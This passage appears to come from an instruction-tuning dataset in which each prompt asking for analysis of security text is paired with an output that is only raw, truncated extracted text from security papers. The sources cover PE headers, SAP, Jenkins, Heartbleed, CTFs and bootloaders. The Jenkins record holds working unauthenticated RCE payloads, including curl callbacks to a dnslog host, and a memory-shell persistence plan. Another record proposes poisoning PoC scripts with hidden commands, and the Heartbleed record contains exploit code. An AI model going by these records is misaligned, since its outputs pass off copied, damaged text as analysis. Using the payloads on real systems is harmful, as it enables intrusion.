头不得不说微软事儿还是挺多的 微软在创建 PE 文件格式时人们正在广泛使用 DOS 文件所以微软为了考虑兼容性的问题所以在 PE 头的最前边还添加了一个 IMAGE_DOS_HEADER 结构体用来扩展已有的 DOS EXE在 WinNTFS.h 里可以看到他的身影 ```h typedef struct _IMAGE_DOS_HEADER { // DOS .EXE header WORD e_magic; // Magic number WORD e_cblp; // Bytes on last page of file WORD e_cp; // Pages in file WORD e_crlc; // Relocations WORD e_cparhdr; // Size of header i", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAndroid 渗透测试入门教程内部资料daxueba.net 版权所有 Android 渗透测试入门教程 内部资料 大学霸 www.daxueba.net Android 渗透测试入门教程内部资料daxueba.net 版权所有 前 言 Kali Linux 是业内最知名的安全渗透测试专用操作系统它的前身就是业界知名的 BackTrack 操作 系统BackTrack 在 2013 年停止更新转为 Kali LinuxKali Linux 集成了海量渗透测试网络扫描 攻击等专用工具通过系统更新用户可以快速获取最新的各类工具所以Kali Linux 是专业人员的 不二选择 目前Android 系统应用非常广泛主要应用在一些可移动设备上如智能手机平板电视数 码相机游戏机等这些设备被广泛地应用在人们工作和生活中在这些设备中往往保存大量的敏 感的个人信息和商业信息由于 Android 设备具备一些严重的安全隐患如基于无线网络通信更容易 被物理接触安全措施滞后等所以很多黑客选择对该类设备实施攻击 为了满足用户的需要本教程针对 Android 设备存在的各种问题介绍了相应的实施渗透测试方法 如 Android 设备传输的数据使用的数据库SQLite程序包的源代码系统或应用程序中的数据等 问题通过对 Android 设备实施渗透可以评估该系统的安全 1.学习所需的系统和软件  安装 Kali Linux 操作系统  Android SDK 管理器 2.学习建议 大家学习之前可以致信到 xxxxxxx获取相关的资料和软件如果大家在学习过程遇到问题也 可以将问题发送到该邮箱我们尽可能给大家解决 Android 渗透测试入门教程内部资料daxueba.net 版权所有 目 录 第 1 章 Android 渗透测试 ......................................................................................................................... 1 1.1 Android 系统概述 ........................................................................................................................ 1 1.2 什么是渗透测试 .......................................................................................................................... 1 1.2.1 渗透测试工作流程 ........................................................................................................... 1 1.2.2 渗透测试类型 ................................................................................................................... 2 1.2.3 法律边界 ........................................................................................................................... 3 1.3 安装 Kali Linux ............................................................................................................................ 3 1.3.1 在硬盘上安装 Kali Linux ................................................................................................. 4 1.3.2 在虚拟机上安装 Kali Linux ........................................................................................... 14 1.3.3 安装 VMware Tools ..................................", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nInternal Server Error: Exploiting Inter-Process Communication in SAP's HTTP Server Martin Doyhenard Security Researcher @ Onapsis  Business Processes software  Operations  Financials  Human Capital  Customer Relationship  Supply Chain  Over 400,000+ Customers (90% Fortune-500)  Based on Web Services through HTTP (Java and ABAP)  Proprietary HTTP Server: Internet Communication Manager https://meritotech.com/wp-content/uploads/2022/01/SAP-Imag.jpg Internet Communication Manager  Handles all communication of the SAP System with its clients and the outside world  Protocols: HTTP, P4, IIOP, SMTP and others  HTTP present by default in all SAP installations (Java, ABAP, WebDispatcher, S/4Hana) ICM HTTP WorkFlow ICM Worker Thread JAVA / ABAP Process HTTP Parser HTTP Handlers CLIENT Memory Pipe HTTP Request HTTP Request ICM Memory Pipes  MPI is an API/Framework to support exchange of data between ICM and Java/ABAP process  Requests/Responses are placed in Shared Memory and accessed using MPI pointers  MPI Buffers are fixed size (216 by default) and are reserved and freed by a Worker Thread ICM WT Java / ABAP Free MPI Buffer Free MPI Buffer Free MPI Buffer Free MPI Buffer Free MPI Buffer Free MPI Buffer Shared Memory MPI Buffer ICM WT I/O Handler GET / HTTP/1.1 . ICM WT Java / ABAP Free MPI Buffer Free MPI Buffer Free MPI Buffer Free MPI Buffer Free MPI Buffer Free MPI Buffer Shared Memory Free MPI Buffer GET / HTTP/1.1 HTTP/1.1 OK MPI Buffer HTTP/1.1 OK ICM WT I/O Handler HTTP/1.1 OK . ICM HTTP WorkFlow  MPI is an API/Framework to support exchange of data between ICM and Java/ABAP process  Requests/Responses are placed in Shared Memory and accessed using MPI pointers  MPI Buffers are fixed size (216 by default) and are reserved and freed by a Worker Thread ICM WT Java / ABAP Free MPI Buffer Free MPI Buffer Free MPI Buffer Free MPI Buffer Free MPI Buffer Free MPI Buffer Shared Memory Free MPI Buffer Free MPI Buffer HTTP/1.1 OK ICM WT I/O Handler HTTP/1.1 OK . ICM HTTP WorkFlow ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJenkins CVE-2018-1000861 内存马注  Jenkins 介绍 Jenkins是个开源的提供友好操作界的持续集成(CI)具在企业中使常泛 相关分析可以看 l1nk3r 师傅的章https://xz.aliyun.com/t/6361 作者 Orange 分析https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html 前 Jenkins 低版本下 (Jenkins <= 2.137 ) 我们可以在未授权的情况下通过 groovy 来进命令执 且利式也 常简单只需要发个 Get 请求就可以了 上的payload多都是些命令执请求外带的的情况 命令执: /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbo x .groovy.SecureGroovyScript/checkScript ?sandbox=true &value=public%20class%20x%20%7B%0A%20%20public%20x()%7B%0A%20%20%20%20%22touch%20%2Ftm p %2Fsuccess%22.execute()%0A%20%20%7D%0A%7D 漏洞检测: 借助 dnslog 等平台进检测 /securityRealm/user/test/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox . groovy.SecureGroovyScript/checkScript? sandbox=true&value=import+groovy.transform.*%0a%40ASTTest(value%3d%7bassert+java.lang. R untime.getRuntime().exec(\"curl http://xxx.ceye.io/CVE-2018- 1000861\")%7d)%0aclass+Person%7b%7d /securityRealm/user/test/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox . groovy.SecureGroovyScript/checkScript? sandbox=true&value=import+groovy.transform.*%0a%40ASTTest(value%3d%7b+\"curl http://xxx.ceye.io/CVE-2018-1000861\".execute().text+%7d)%0aclass+Person%7b%7d 但是我在实际利的情况下由于反弹shell这些常容易检测所以利就直接触发了告警当时就在想有没有 更好的利法最好能传个 webshell 上去但是发现很多官提供的 war 包可直接通过 java -jar 进启动 所以件上传也没什么可能性于是我就尝试利内存马来进权限维持 内存马注实际其实就是代码注在查阅了漏洞描述等章后发现这实际上是 Groovy 沙盒逃逸导致的漏洞 由于是 Groovy 代码执所以让内存马注有了可能性 所以致的思路如下 发现 Jenkins 漏洞 -> 反弹shell触发告警尝试别的法 -> 发现漏洞利为 Groovy 代码执 -> Jetty 回显 -> Jetty 内 存马注 -> Payload 体积过问题 环境准备 Jenkins 下载 修改可下任意版本 https://updates.jenkins-ci.org/download/war/2.31/jenkins.war https://get.jenkins.io/war/2.302/jenkins.war 下载 war 包之后解压导 IDEA 然后利如下命令开启远程调试模式此我们就可以动态调代码了 java -jar -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005 jenkins2.137.war 命令执回显 先不急着内存马注先尝试解决回显毕竟回显是内存马的第步官提供的 war 是可以直接 java -jar 进 启动 可以看到带的是 Jetty 通过时间延迟来判断命令是否执: 延时5s http://localhost:8080/securityRealm/user/test/descriptorByName/org.jenkinsci.plug", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n摸鱼的时候在挖洞本身想写一个文件内容过滤的小脚本误报太多了发现报错看网 上貌似是编码问题于是我就百度了下发现 py 上加两句就可以了 # -*- coding: utf-8 -*- # coding:unicode_escape 但是当我运行的时候我突然发现注释报错了 本来我以为是正常的报错debug 一下发现正常代码没任何问题但我发现行数不对是 在第 13 行但是这是被注释掉的内容啊我深入了一下发现问题出现在 \\n 和 unicode_escape 上于是我新搞了个文件进行测试 可以成功解析\\n那么使用命令呢 我们可以看到注释的内容并不会在 debug 中跟到注释当中但是会执行注释当中的语句 这也就是为什么我 debug 不出来的原因 但是 python 为啥使用 unicode_escape 即可解析注释的内容呢带着这个问题写一个 demo 进行原理分析我们可以看到下面两张图第一个是使用的 unicode_escape 编码的文件而 第二个文件则是默认的 utf-8 Test2.py 内容 # coding:unicode_escape # \\nprint('1) 其中我们可以看到 unicode_escape 的文件语句是 \\nprint(1)而默认的则是\\\\n,也就是说明 unicode_escape 的其实是给\\\\n 减少了一个\\ 于是尝试 debug打上断点我发现第一次出现 unicode_escape 是在 我们定位到 read_or_stop 发现只是一个简单的 readline而注释也说了最多只会调用两次所以这也是为什么开发 一般编码都要放在第一行的原因并且也说明了如果未指定编码默认将是 utf-8 然后继续往下走省下中间一堆无用过程我们可以看到此时的 print1前面还是\\\\n 但是在 513 行先是判断 encoding 存不存在如果存在就用 encoding 进行解析本身存在 的 line此时我们可以看到\\\\n 被解析成了\\n于是就后面的 print(1)因为换行符的原因被 调到了下一行也就正常执行了 我们本地简单测试下 可以发现正常的 a 输出后会减少一个\\但还是会输出\\n但是当使用 decode unicode_escape后我们发现被解析了因为 print 本身就会空一行所以 print(\\n被 解析后的\\n)就会空 2 行这也就成功的逃逸出注释符了 这证明什么证明只要能解析掉换行符我们即可执行注释那么除了 unicode_escape 编码 还有其他的么打开 python 的底层源码发现在 codescs.rst 中记录着各式各样的编码在 unicode_escape 上方还有一个 raw_unicode_escape 尝试用 raw_unicode_escape 执行 py 发现不行不过没关系看一下源码中是咋注释的毕竟带有 unicode_escape肯定是有关 系的上面是要以\\uxxxx那么试用一下换行符\\u000d发现也可以成功解析 不过除了这种应该还会有我也就没有继续深挖下去有兴趣的师傅可以自己看一看 python 的编码应该是还会有其他的可以解析 后面我在想既然 python 能有这种编码操作那么 php 和 java 会不会有呢很不幸的是 花活最多的 php 没找到这种操作可能是因为我太菜了但 java 却有了突破找到了之前 p 牛写的一篇文章unicode 反噬用的也是利用注释进行 bypass果然大佬永远快一步 如图 发现与 py 一样同样可以执行注释里的内容 但 java 与 py 不同的是java 本身会用 unicode 解析整个项目然后再进行执行所以如图 所示正常我们是可以执行计算器的 但是如图所示当我们在 java 代码中添加了\\u000d 后java 这边会执行报错因为他解析 了换行符所有就不会正常执行 与之对应的是 py虽然第四行同样报错但 py 是一句一句执行的所以可以正常的输出 1 但 java 先进行了一遍整体 unicode 解析所以当解析完换行符后java 就不会开始执行而 是报错了 用这个可能可以做到很多事比如网站我们构造注释 webshell比如二开 poc 脚本投毒进行 钓鱼比如构造一个好玩的小程序用注释偷偷恶搞用拼接的方式构造命令上线 cs玩法有 很多很多后面想到了再补充吧 最后再放上 p 师傅的两个样本供大家学习 Author Zac 公众号 ZAC 安全 微信 zacaq999 知识星球 安全宝典", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAfriNIC 1.48% ARIN 27% RIPE NCC 29.79% APNIC 36.51% LACNIC 5.23% IPv4 Address Space Status RIR allocations IPv4 /8s Remaining As of 31 March 2010 Available /8s As of 31 March 2010 IPv4 Allocations by RIR January 1999 - March 2010 Available 8.59% Allocated 77.74% Unavailable 13.67% GLOBAL IP ADDRESSING STATISTICS For more statistics, see ARINs website at https://www.arin.net/knowledge/statistics/, or contact us at info@arin.net. AfriNIC 0.1% LACNIC 0.4% APNIC 33.2% RIPE NCC 45.9% ARIN 20.4% IPv6 Allocations by RIR January 1999 - March 2010 09 10 08 06 07 Mar Mar Jun Jun Mar Sep Dec Mar Jun Sep Dec Mar Jun Sep Sep Dec Dec 62 62 59 55 49 49 44 42 41 39 39 34 26 22 26 32 30 IPv4 IPv6 For more statistics, see ARINs website at https://www.arin.net/knowledge/statistics/, or contact us at info@arin.net. /24 /23 /22 /21 /20 /19 /18 /17 /16 /15 /14 /13 /12 /11 /10 /9 99 00 01 02 03 04 05 06 07 08 50K 100K 150K 200K 250K Total IPv4/24s Issued by ARIN IPv6 Block Size Distribution January - December 2009 IPv4 Block Size Distribution January - December 2009 Total IPv6 Requests Fulflled 99 2 7 8 16 51 42 57 75 217 245 00 01 02 03 04 05 06 07 08 395 09 /48 /47 /46 /44 /45 /43 /42 /41 /40 /39 /36 /32 # of requests ARIN IP ADDRESSING STATISTICS 50 100 150 200 250 300 09 100 200 300 400 500 600", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#!/usr/bin/python # Quick and dirty demonstration of CVE-2014-0160 originally by Jared Stafford (jspenguin@jspenguin.org) # The author disclaims copyright to this source code. # Modified by SensePost based on lots of other people's efforts (hard to work out credit via PasteBin) from __future__ import print_function from builtins import str from builtins import range import sys import struct import socket import time import select import re from optparse import OptionParser import smtplib options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') options.add_option('-n', '--num', type='int', default=1, help='Number of heartbeats to send if vulnerable (defines how much memory you get back) (default: 1)') options.add_option('-f', '--file', type='str', default='dump.bin', help='Filename to write dumped memory too (default: dump.bin)') options.add_option('-q', '--quiet', default=False, help='Do not display the memory dump', action='store_true') options.add_option('-s', '--starttls', action='store_true', default=False, help='Check STARTTLS (smtp only right now)') def h2bin(x): return x.replace(' ', '').replace('\\n', '').decode('hex') hello = h2bin(''' 16 03 02 00 dc 01 00 00 d8 03 02 53 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 00 0f 00 01 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDUST Your Rss Feed belongs to you! Chema Alonso chema@informatica64.com Juan Garrido Silverhack jgarrido@informatica64.com Once upon a time.  and we believed it  Internet is a space of freedom  All opinions are allowed  Freedon for news  Nobody controls Internet  Neutrality  Anonimaty  No Rules  . We lived in the age of Aquarius Our biggest problem: Trolls ..and we managed as cultured people But them. and we leaved out Matrix We dont like you! We dont like you! We dont like you! We dont like you! 4nOym0us HBGary Ownage  Backdoors:  Task B y 12 monkeys  Fake FaceBook profiles  Viral propaganda on Intenet Internet has weaknesses  Network connections  Great Wall Firewall in China  BGP Attack in Egypt  DNS systems  Wikileaks.org  Rojadirecta.org  Laws,  Every Country  International Laws Spain: Our politicians Arent you somehow ..? How to shout you off ?  GOAL: To disconnect your audience.  HOW?  Taking the root off  (owning the system)  Making it unavailable  D.O.S.  Making it unlocalizable  Closing the domain name  Blocking service accounts  Facebook  Twitter  Google  Infosec war (Banning from web searchers)  Throwing on it the law Some fixes: OpenNIC Some Fixes: P2P DNS Workarrounds: OSIRIS CMS But, what happend if you Watch out what you say... If you have nothing to hide therefore you have nothing to fear  until we change the policy Watch out what you say... Your RSS is under survilliance Enjoy but I am reading your RSS From blogger to reader  Domain name  Browsing the web  RSS Suscriptions  Readers connected to the XML Feed  Author?  Blogger system account  Domain name  Http RSS Feed FeedBurner It they close your blog?  If blog is taken down you can change the feed, but if you got the feed with them.. Silence Calm DUST: Redundant Feeds by Http & P2P  RSS Feed PGP-signed by P2P.  RSS Feeds reader from a source  Http (multiple-ones)  P2P (multiple-Public PGP Keys)  Republish of content  RSS Feed  Just posts or comments DUST: Redundant Feeds by Http & P2P  RSS Feeds ar", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTRACKING SPIES IN THE SKIES FBI CESSNA N496WW. PHOTO BY CHRIS KENNEDY ABOUT THE TALK LAW ENFORCEMENT AND AERIAL SURVEILLANCE History of aerial surveillance (Sam Richards) Technology on spy planes (Jerod MacDonald-Evoy) Detecting surveillance aircraft (Jason Hernandez) @minneapolisam @jerodmacevoy @jason_nstar HISTORY OF THE SKY SPIES Odd ight patterns noticed, , Baltimore r/conspiracy (John Wiesman - ADSB Detection) Citizen journalists ( ) #FBISkySpies and , links to FlightRadar24 tracks WSJ Sam Richards 100 Tail- numbers SKY SPIES 101 goes viral, a week later (nothing happens) FBI Planes hidden behind front companies (FVX Research, et. al) Sam's story AP breaks it into the mainstream Sen. Franken calls for investigation WHAT WE KNOW FAA FOIA DATA GEOSPATIAL ANALYSIS SURVEILLANCE INDUSTRIAL COMPLEX TYPES OF AIRCRAFT Small xed wing (Cessnas) Large dual engine (Beechcraft) Military style (Pilatus) Helicopters Drones (Small and Large) PHOENIX PD PILATUS PC-12. PHOTO BY CHRIS KENNEDY EQUIPMENT Infrared cameras - and other models Cell site simulators (a.k.a. Stingrays, IMSI catchers, etc.) \"LETC\" Devices [Law Enforcement Technical Collection] Wescam by L3 Communications FLIR SAFIRE EXAMPLES OF USE FBI Aerial Surveillance of Freddie Grey protests Phoenix PD used Pilatus to follow U-Haul thief FBI Aerial Surveillance of Arizona I-10 shooter suspect's apartment HIDDEN IN PLANE SIGHT FBI, CBP, DEA and DOJ use of front companies The Delaware problem $10 FAA records request reveals equipment PHOENIX PD PLANE FOOTAGE OBTAINED VIA PUBLIC RECORDS REQUEST FROM PHOENIX PD 0:00 / 1:37 VIDEO AT ARCHIVE.ORG VIDEO AT YOUTUBE.COM TRACKING THE SKY SPIES How do we more generally detect surveillance aircraft and activity? Registrations can be changed and obscured Many surveillance technologies are commercially available How much surveillance is happening in other parts of the world? Technical and operational requirements dictate ight patterns Surveillance ights look very dierent from most ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Shall we play a game (re 113p, 111 solved) This turned out to be a very annoying challenge, because I was working on the x86 version of it, and it was broken and didn't give the proper flag. As a result I solved this task 3 times, with 3 different methods, which is worth writing down. The challenge is a simple [Android App](app.apk) with tic-tac-toe game. We need to win 1M times to get the flag. The code is not pure Java - there is also a native library with a single function. Since the library was provided for ARM, x86 and x64 I was using x86 emulator, which is much faster than ARM, and this was a mistake, most likely not anticipated by the author. My first approach to the task was to Reverse Engineer the code and figure out how the flag is calculated. I didn't know Smali very well so I was not eager to dive into patching the app at this point. I got the [decompiled code](app_source.zip) and started looking at what was happening there. The important bits were (labelled by me): ```java Object f2329n = C0644N.m3217_(Integer.valueOf(3), C0644N.f2341h, Long.valueOf((((((((1416127776 + 1869507705) + 544696686) + 1852403303) + 544042870) + 1696622963) + 544108404) + 544501536) + 1886151033)); int winCounter; boolean gameEnd; byte[] f2332q = new byte[32]; byte[] f2333r = new byte[]{(byte) -61, (byte) 15, (byte) 25, (byte) -115, (byte) -46, (byte) -11, (byte) 65, (byte) -3, (byte) 34, (byte) 93, (byte) -39, (byte) 98, (byte) 123, (byte) 17, (byte) 42, (byte) -121, (byte) 60, (byte) 40, (byte) -60, (byte) -112, (byte) 77, (byte) 111, (byte) 34, (byte) 14, (byte) -31, (byte) -4, (byte) -7, (byte) 66, (byte) 116, (byte) 108, (byte) 114, (byte) -122}; public GameActivity() { C0644N.m3217_(Integer.valueOf(3), C0644N.f2342i, this.f2329n, this.f2332q); this.winCounter = 0; this.gameEnd = false; } void showFlag() { Object _ = C0644N.m3217_(Integer.valueOf(0), C0644N.f2334a, Integer.valueOf(0)); Object _2 = C0644N.m3217_(Integer.valueOf(1), C0644N.f2335b, this.f2332q, Integer.val", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMach%O'Malware'Analysis:'Combatting'Mac'OSX/iOS'Malware'with'Data'Visualization! ! ' ' ' ' Defcon'2013' Mach%O'Malware'Analysis:' Combatting*Mac*OSX/iOS*Malware*with*Data*Visualization* ' Remy'Baumgarten' ANRC'LLC.' Mach%O'Malware'Analysis:'Combatting'Mac'OSX/iOS'Malware'with'Data'Visualization! ! Mach%O'Malware'Analysis:' Combatting'Mac'OSX/iOS'Malware'with'Data'Visualization' Remy!Baumgarten,!Security!Engineer,!ANRC!LLC.! Draft&Date:&Apr&02,&2013& ! Apple!has!successfully!pushed!both!its!mobile!and!desktop!platforms!into!our!homes,!schools!and!work! environments.!!With!such!a!dominant!push!of!its!products!into!our!everyday!lives!it!comes!as!no! surprise!that!both!of!Apples!operating!systems,!OSX!and!iOS!should!fall!under!attack!by!malware! developers!and!network!intruders.!!Numerous!organizations!and!Enterprises!who!have!implemented! BYOD!(bring!your!own!device)!company!policies!have!seemingly!neglected!the!security!effort!involved! in!protecting!the!network!infrastructure!from!these!potential!insider!threats.!The!complexity!of! analyzing!MachNO!(Mach!object!file!format)!binaries!and!the!rising!prevalence!of!MacNspecific!malware! has!created!a!real!need!for!a!new!type!of!tool!to!assist!in!the!analytic!efforts!required!to!rapidly! identify!malicious!content.!!In!this!paper!we!will!introduce!Mach3O&Viz,!a!MachNO!Interactive!Data! Visualization!tool!that!lends!itself!to!the!role!of!aiding!security!engineers!in!quickly!and!efficiently! identifying!potentially!malicious!MachNO!files!on!the!network,!desktop!and!mobile!devices!of! connected!users.! ! ! ! ! ! ! ! ! ! ! ! Mach%O'Malware'Analysis:'Combatting'Mac'OSX/iOS'Malware'with'Data'Visualization! ! Introduction!.....................................................................................................................................................................!4! Why!a!New!Tool?!...............................................................................................................................", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTools for Censorship Resistance Rachel Greenstadt greenie@eecs.harvard.edu Defcon XII July 29, 2004 http://www.eecs.harvard.edu/ greenie/defcon-slides.pdf Tools for Censorship Resistance  p.1/37 Overview Approaches to Censorship Circumvention methods Case study: China Censorship in a free society the LOCKSS project Unobservability Tools for Censorship Resistance  p.2/37 A Taxonomy of Censorship Generalized Blocking Blocking publishers/servers Blocking receivers/clients Modifying content for censorship \"Arms race\" solutions okay Surveillance/Chilling Effects Relies on accountability/punishment Effective censors use multiple techniques Tools for Censorship Resistance  p.3/37 Blocking Publishers Figure 1: Bonsai kitten picture from bonsaikitten.com Hardest form of censorship to do (spam) Offensive material for- bidden by govt/ISP/DOS attackers Tools for Censorship Resistance  p.4/37 Circumventing Publisher Blocking Find someone who will make material available More permitting ISP Writable web pages (blogs, etc) Outside jurisdictions Anonymity services Can help if publisher blocking is combined with surveillance Hidden servers may prove useful for avoiding DOS attacks Current systems probably too fragile Tools for Censorship Resistance  p.5/37 Blocking Receivers If the blocking authority has control over some, but not all, internet users Government firewalls at routers Corporate firewalls Nannyware in schools/libraries Tools for Censorship Resistance  p.6/37 Blocking Approaches 1 Web Site Blocked The website you were trying to access was deemed inappropriate by the Authorities. If you feel that this particular web site should not have been blocked per our policy, you may ask that the web site be removed from the blocked list by going to the following website. If you have any questions, contact us at internetpolice@authority.net. Tools for Censorship Resistance  p.7/37 Blocking Approaches 2 Tools for Censorship Resistance  p.8/37 Blocking Techniques Block open or closed? D", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFace Swapping Video Detection with CNN Wang Yang, Junfeng Xiong, Liu Yan, Hao Xin, Wei Tao Baidu X-Lab Face Swapping Video Detection with C NN  Deepfakes Video  A simple and effective CNN  Face recognition based method Deepfakes Video When Face Recognition Systems Meet D eepfakes Vulnerable Face comparison before fake faces  Microsoft Azure azure.microsoft.com Similarity 86.0% Similarity 70.5% Real Fake When Face Recognition Systems Meet D eepfakes Similarity 95.1% Similarity 87.3% Vulnerable Face comparison before fake face s  Amazon AWS aws.amazon.com Real Fake Face Swapping Video Generation Characteristics  Swap victims face in every frame independently  Not End2End  Only manipulate central face area  Autoencoder Deepfakes Training Phase Deepfakes Generation Phase  Convert  Person A Encoder -> Person B Decoder  Merge back  Gaussian Blur/Color Average  Poisson Image Editing Face Swapping Video Detection with C NN  Deepfakes Video  A simple and effective CNN  capturing low-level features of the images  Face recognition based method A Simple and Effective CNN Design purpose  Input contains marginal(background) information.  Capture low-level features of the images. margin (background) face area A Simple and Effective CNN Training  Dataset from VidTIMIT  67600 fake faces and 66629 real faces  low quality and high quality images  Cropped faces  with face landmark detector MTCNN  obtain 1.5 scaled bounding box  Augmented data  horizontal flipping  randomly zooming  shearing transformations A Simple and Effective CNN Characteristics  3 convolution layers  Accuracy rate: 99% Face Swapping Video Detection with C NN  Deepfakes Video  A simple and effective CNN  Face recognition based method  capturing high-level features of faces What is FaceNet? Characteristics  SOTA CNN for face recognition  Model structure  Triple Loss FaceNet: A unified embedding for face recognition and clustering A FaceNet based SVM classifier Training  Central Face area  No margin/background  Only f", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCODE REVIEW GUIDE RELEASE Creative Commons (CC) Attribution Free Version at: https://www.owasp.org Project leaders: Larry Conklin and Gary Robinson 2.0 1 Foreword Acknowledgements 1 3 6 8 5 Introduction How To Use The Code Review Guide 2 Code Review Dos And Donts Code Review Checklist Threat Modeling Example Code Crawling 192 196 200 206 3 A1 Injection A2 Broken Authentication And Session Management A3 Cross-Site Scripting (XSS) A4 Insecure Direct Object Reference A5 Security Misconfiguration A6 Sensitive Data Exposure A7 Missing Function Level Access Control A8 Cross-Site Request Forgery (CSRF) A9 Using Components With Know Vulnerabilities A10 Unvalidated Redirects And Forwards 43 58 70 77 82 117 133 139 146 149 Technical Reference For Secure Code Review Appendix 4 HTML5 Same Origin Policy Reviewing Logging Code Error Handling Reviewing Security Alerts Review For Active Defence Race Conditions Buffer Overruns Client Side JavaScript 154 158 160 163 175 178 181 183 188 Secure Code Review Methodology 9 20 Introduction 2 1 3 Code Review Guide Foreword - By Eoin Keary By Eoin Keary, Long Serving OWASP Global Board Member The OWASP Code Review guide was originally born from the OWASP Testing Guide. Initially code review was covered in the Testing Guide, as it seemed like a good idea at the time. Howev- er, the topic of security code review is too big and evolved into its own stand-alone guide. I started the Code Review Project in 2006. This current edition was started in April 2013 via the OWASP Project Reboot initia- tive and a grant from the United States Department of Home- land Security. The OWASP Code Review team consists of a small, but talented, group of volunteers who should really get out more often. The volunteers have experience and a drive for the best practices in secure code review in a variety of organizations, from small start-ups to some of the largest software development organi- zations in the world. It is common knowledge that more secure software can", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTAKBOO 深度解析BOOTLOADER攻击面 WHO AM I? takboo THIS IS A QUESTION! ABOUT ME  SecRet 团队成员  Android 漏洞研究  Linux 内核漏洞研究 联系方式:takboosf@gmail.com PART 01 Bootloader 背景 PART 02 主流厂商 Bootloader 对比 PART 03 Qualcomm aboot PART 04 Bootloader 漏洞挖掘 PART 05 Bootloader 漏洞分析 目录 CONTENTS 01 bootloader 背景 Bootloader 背景 PC 端 BOOTLOADER  BIOS/UEFI/UBOOT  检查硬件加载操作系统  多阶段启动 Bootloader 背景 移动设备 BOOTLOADER  多阶段启动  完整性  来源检测  版本检测 Bootloader 背景 ARM TRUSTED BOOT  CoT(chain of Trust)  Trusted Boot  TEE(Trusted Execution Environment)  TrustZone  异常级别 Bootloader 背景 ARM TRUSTED BOOT Bootloader 背景 ANDROID BOOTLOADER  aboot/hboot/sboot  启动安卓系统  厂商实现差异 Bootloader 背景 ANDROID VERIFIED BOOT  延续 CoT  两套实现  安全状态转换  Bootloader 解锁 02 主流厂商对比 主流厂商 Bootloader 对比 QUALCOMM BOOTLOADER  Aboot  市场占有率高  EL1  LK(Little Kernel)  符合 Trusted Boot 和 Verified Boot 主流厂商 Bootloader 对比 MEDIATEK BOOTLOADER  类似于aboot  EL1  不开源  初始化重要硬件  符合 Trusted Boot 和 Verified Boot 主流厂商 Bootloader 对比 HUAWEI BOOTLOADER  整合后续启动阶段  EL3  不开源  符合 Trusted Boot 和 Verified Boot 主流厂商 Bootloader 对比 SAMSUNG BOOTLOADER  sboot  EL1  不开源  Odin 模式 主流厂商 Bootloader 对比 Vendor EL Fastboot Qualcomm EL1 TRUE MediaTek EL1 TRUE Huawei EL3 TRUE Samsung EL1 TRUE 03 Qualcomm aboot Qualcomm aboot LK  开源(git://codeaurora.org/kernel/lk.git)  BL33  支持多种启动模式  支持 unlocking Lk 源码分析 http://www.freebuf.com/news/135084.html Qualcomm aboot LK  进行各种早期的初始化工作(cpu, emmc thread etc)  判断进入 recovery 或 fastboot 的条件是否被触发  从 emmc 中获取 boot.img 并加载到指定内存区域  从内存加载 kernel 到 KERNEL_ADDRESS  从内存加载 ramdisk 到 RAMDISK_ADDRESS  加载设备树到 TAGS_ADDRESS  关闭 cache, interrupts, 跳转到 kernel Qualcomm aboot FASTBOOT  指令注册  启动监听  指令解析与执行 Qualcomm aboot  指令数组  指令链表  指令注册 * Qualcomm aboot  fastboot 初始化  fastboot 线程启动  等待USB Qualcomm aboot  读取 USB  解析命令 04Bootloader 漏洞挖掘 Bootloader 漏洞挖掘 BOOTLOADER 难点  闭源  无调试符号  格式不统一  函数库/函数签名  硬件耦合 Bootloader 漏洞挖掘 BOOTLOADER 攻击面  存储数据  Sdcard 数据  Recovery 命令  Fastboot 命令 